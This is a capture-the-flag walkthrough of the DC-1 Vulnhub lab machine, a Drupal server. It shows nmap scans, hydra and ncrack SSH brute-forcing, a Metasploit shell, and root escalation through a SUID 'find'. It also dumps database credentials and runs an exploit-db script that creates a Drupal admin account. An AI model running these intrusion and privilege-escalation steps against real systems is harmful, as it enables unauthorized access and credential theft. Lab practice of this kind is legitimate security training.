Want to practice the skills necessary for developing practical ethical hacking experience? Then read on. That is leveraging Kali Linux against a test virtual machine for one purpose, to go from user to root. Even more so, the goal is to not take the easy way out. Resisting the natural urge to use Metasploit is a habit that is worth starting. That is why I have both options, using Metasploit and not, documented in this walkthrough. This is the DC-1 Vulnhub Kali Linux walkthrough.
Want to setup a home pentesting lab to practice your ethical hacking skills? I spell out how it’s done in the 10 easy steps post.
The DC-1 vulnhub image is a Debian 32 bit operating system with Drupal CMS installed and running. With five flags to capture and read there is plenty to do with this one. I went back afterwards and continued to reason how one could exploit the image in different ways.
There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.
vulnhub.com
Table of Contents
Here’s What You Need
- DC-1 vulnerable machine from vulnhub. (VirtualBox)
- Kali Linux virtual machine. (VirtualBox)
The first step is to try to list the running services on the DC-1 vulnerable box. For this I use a variety of tools, nmap, netdiscover, nbtscan.
root@kali:~# nmap -sV 10.0.2.6
Brute-forcing the Running Services
Kali Linux has tools installed already to brute force services on victims. These are hydra, ncrack, and others.
root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 10.0.2.6 ssh
root@kali:~# ncrack -p 22 --user root -P /usr/share/wordlists/rockyou.txt 10.0.2.6
One of the best nmap scans to run is to scan for service versions.
msf > db_nmap -sV -Pn 10.0.2.6
Using Netcat
netcat can act as a TCP server and as a TCP client.
msf5 > nc -z 10.0.2.6
[*] exec: nc -z 10.0.2.6
no port[s] to connect to
msf5 > nc -nv 10.0.2.6
Using Metasploit to Hack DC-1
The right setup can save a lot of time later on. That means I make it a habit to follow these steps every time I launch msfconsole. Performing a db_nmap scan means I can use the hosts and services commands later to list a formatted table of the data gathered so far.
# FOLLOW THESE DIRECTIONS!
# start the database server
root@kali:~ service postgresql start
root@kali:~ msfdb init
root@kali:~ msfconsole
# create workspace. -a for "add"
msf > workspace -a dc01
msf > workspace dc01
100644/rw-r–r– 52 fil 2019-02-19 08:45:11 -0500 flag1.txt
# go to the mysql service location
cd /var/www/includes/database
# open a shell from meterpreter
meterpreter > shell
Looking for files on the server that belong to and are executable by the root user. Python’s pty module to open a local bash shell. Technically the pty module’s spawn method starts a named process and attaches the parent process to the new one’s standard input and output. In this scenario I run Python code using the -c flag. In this syntax multiple statements are separated by a semicolon;.
meterpreter > shell
Process 5291 created.
Channel 11 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www/$
Look for binaries that are owned by root with the hopes of running one of them as root.
find / -user root -perm -4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
The find command will look for and execute the /bin/sh binary locally.
www-data@DC-1:/var/www$ find . -exec '/bin/sh' \;
MySQL Database Hacking
Now that we have a bash shell on the local server let’s revisit the database access that we gained earlier.
# mysql -u dbuser -p drupaldb
mysql -u dbuser -p drupaldb
Enter password: R0ck3t
mysql> show databases;
mysql> use drupaldb;
mysql> show tables;
mysql> select * from users;
select * from users;
# Passwords everywhere!
mysql> exit;
Cracked the password found in /etc/shadow for the user, flag4. The password is orange!
SSH Access Using Cracked Password
Using the password I cracked for the flag4 user I make a simple login to the DC-1 server.
Using hydra again only this time cutting the computing time down drastically by supplying the correct username.
root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 10.0.2.6 ssh
Or by using ncrack.
root@kali:~# ncrack -p 22 --user root -P /usr/share/wordlists/rockyou.txt 10.0.2.6
Not Using Metasploit
Learn a new command, searchsploit! The exploits are stored in /usr/share/exploitdb and consist of PHP, Ruby, Python, etc scripts.
Using the exploits in Kali Linux without metasploit is surprisingly extensible to the same vulnerable Drupal server.
msf5 > python /usr/share/exploitdb/exploits/php/webapps/34992.py -t 10.0.2.6 -u hacker -p pass
[!] VULNERABLE!
[!] Administrator user created!
[*] Login: hacker
[*] Pass: pass
[*] Url: http://10.0.2.6/?q=node&destination=node